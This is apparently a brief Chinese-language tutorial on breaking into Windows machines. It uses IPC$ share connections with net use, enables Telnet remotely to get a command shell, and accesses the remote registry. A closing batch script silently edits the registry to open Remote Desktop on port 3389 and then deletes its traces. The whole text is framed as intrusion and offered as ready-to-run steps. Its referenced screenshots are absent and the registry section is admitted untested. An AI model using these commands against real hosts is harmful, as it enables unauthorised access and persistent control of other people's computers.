windows IPC$ telnet 注册表 入侵

一． IPC$入侵

 条件：能ping通对方的主机， 有对方的一个用户而且这个用户必须有密码

     

     连接：net  use  \\192.168.0.2

            按提示输入对方的用户名和密码

     

     映射盘符：net  use  z:  \\192.168.0.2\c$

将对方的Ｃ盘映射为自己电脑的Z盘

 

  命令图：

 

结果：

 

 

二．Telnet入侵

在IPC$入侵的基础上，也就是建立了IPC$入侵后，执行以下操作

 

1）首先要让对方的电脑开启telnet服务

步骤1：计算机-----管理-----操作-----连接远程计算机

 

步骤2：找到service，开启telnet服务

 

 

2) 这时可以断开IPC$服务了

    命令 ： net  use  * /del

 

3）更改 cmd的属性，使其用管理员运行

步骤：开始----所有程序---附件---命令行----右键属性

 

4)   连接telnet

命令： telnet  192.168.0.2

然后按提示输入对方的用户名密码登陆就可以得到对方的cmd了

 

三．注册表入侵

同样实在ipc$连接的基础上，打开注册表，文件----连接远程注册表---输入对方的电脑名称或用户名---检查名称

 

 

还没试过：不细说了

 

 

附：命令行开启远程桌面（保存为bat运行即可）

echo Windows Registry Editor Version 5.00>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

regedit /s 3389.reg 

del 3389.reg